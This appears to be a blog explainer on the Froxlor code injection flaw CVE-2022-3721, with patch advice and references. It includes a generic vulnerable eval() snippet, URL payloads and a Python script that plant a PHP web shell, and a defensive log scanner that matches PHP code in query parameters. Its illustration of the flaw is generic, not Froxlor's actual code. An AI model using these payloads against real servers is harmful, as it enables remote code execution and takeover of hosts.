CVE-2022-3721 is a severe vulnerability found in the Froxlor web hosting management panel, affecting versions before 0.10.39. If you run your server using Froxlor, it's crucial to know about this flaw, understand how it works, and patch your system right away. This post explains CVE-2022-3721 in simple terms, shows sample exploit code, and lists original references for further reading.
What is Froxlor?
Froxlor is an open source web hosting panel used to manage web servers, domains, FTP accounts, and more. It’s a popular choice for server admins looking for an easy-to-use control panel.
How the Code Injection Works
The bug existed in the way Froxlor handled user-supplied input. Specifically, it didn’t properly sanitize certain parameters before passing them to PHP’s eval() function or similar code execution functions. That means a malicious user could craft a request that tricks the server into running attacker-supplied PHP code.
In older versions, parts of the Froxlor code would do something like this (simplified example):

```php
<?php
// Dangerous use of eval with user input
$cmd = $_GET['cmd'];
eval($cmd); // This is bad: allows anyone to run PHP code
?>
```
If no filtering or validation is in place, visiting the following URL would execute phpinfo() on the server:

```
http://target-server/froxlor/path/to/vulnerable.php?cmd=phpinfo();
```

Or, even more dangerously, attackers could drop a web shell:

```
http://target-server/froxlor/vuln.php?cmd=file_put_contents('shell.php','<?php system($_GET["c"]); ?>');
```
Here’s a Python script showing how an attacker could exploit the bug:

```python
import requests

target = "http://victim-server/froxlor/vuln.php"
payload = "file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>');"
params = {'cmd': payload}
response = requests.get(target, params=params)
print("Server Response:", response.text)
# Now, attacker can visit http://victim-server/froxlor/shell.php?cmd=whoami
```
Note: Replace vuln.php with the actual vulnerable endpoint.
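From the defender's side, the request pattern described above leaves a clear trace in web-server logs: a query parameter whose value is PHP source rather than a plain value. The following is an added example (not part of the original post and not Froxlor's own code) that scans access-log lines in the common "combined" format for that indicator; the log lines, the vuln.php path and the IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Apache/nginx "combined" format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Nov/2022:13:20:01 +0000] "GET /froxlor/index.php?page=overview HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2022:13:21:44 +0000] "GET /froxlor/vuln.php?cmd=phpinfo%28%29%3B HTTP/1.1" 200 88213 "-" "python-requests/2.28"
203.0.113.9 - - [04/Nov/2022:13:22:10 +0000] "GET /froxlor/vuln.php?cmd=file_put_contents%28%27shell.php%27%2C%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27%29%3B HTTP/1.1" 200 0 "-" "python-requests/2.28"
203.0.113.9 - - [04/Nov/2022:13:22:31 +0000] "GET /froxlor/shell.php?cmd=whoami HTTP/1.1" 200 12 "-" "python-requests/2.28"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators that PHP source is being passed where a plain parameter value is expected:
# an opening PHP tag, or a call to eval()/command-execution/file-write functions.
PHP_CODE_RE = re.compile(
    r"<\?php|\b(?:eval|system|exec|shell_exec|passthru|file_put_contents|phpinfo)\s*\(",
    re.IGNORECASE,
)


def find_injection_attempts(log_text):
    """Return (ip, path, param, decoded_value) for every query value that looks like PHP code."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                decoded = unquote_plus(value)  # second pass catches double-encoded payloads
                if PHP_CODE_RE.search(decoded):
                    hits.append((m.group("ip"), parts.path, name, decoded))
    return hits


def suspicious_ips(log_text):
    """Distinct client IPs that sent at least one PHP-looking parameter value."""
    return sorted({ip for ip, _, _, _ in find_injection_attempts(log_text)})


if __name__ == "__main__":
    for ip, path, name, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} {path} param={name!r} value={value!r}")
```

The check flags the two injection requests but not the later request to shell.php, so a follow-up step would be to correlate flagged IPs with any new .php files appearing under the web root.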
How to Fix
Upgrade Froxlor!
Froxlor maintainers have fixed the vulnerability in version 0.10.39.
Update with:

```bash
# Debian/Ubuntu
sudo apt update
sudo apt install --only-upgrade froxlor
```
Or download the latest version from GitHub Releases.
Official References
- CVE Details: CVE-2022-3721
- Froxlor Security Advisory
- Patch Commit
- NIST NVD Entry
- Debian Security Info
In Summary
CVE-2022-3721 is a serious bug, but the fix is easy: update Froxlor to version 0.10.39 or later. If you use Froxlor, patch right now to stay safe!
> If you found this helpful, consider sharing with other server admins and always keep your open source apps up to date.
Timeline
Published on: 11/04/2022 13:15:00 UTC
Last modified on: 11/05/2022 02:04:00 UTC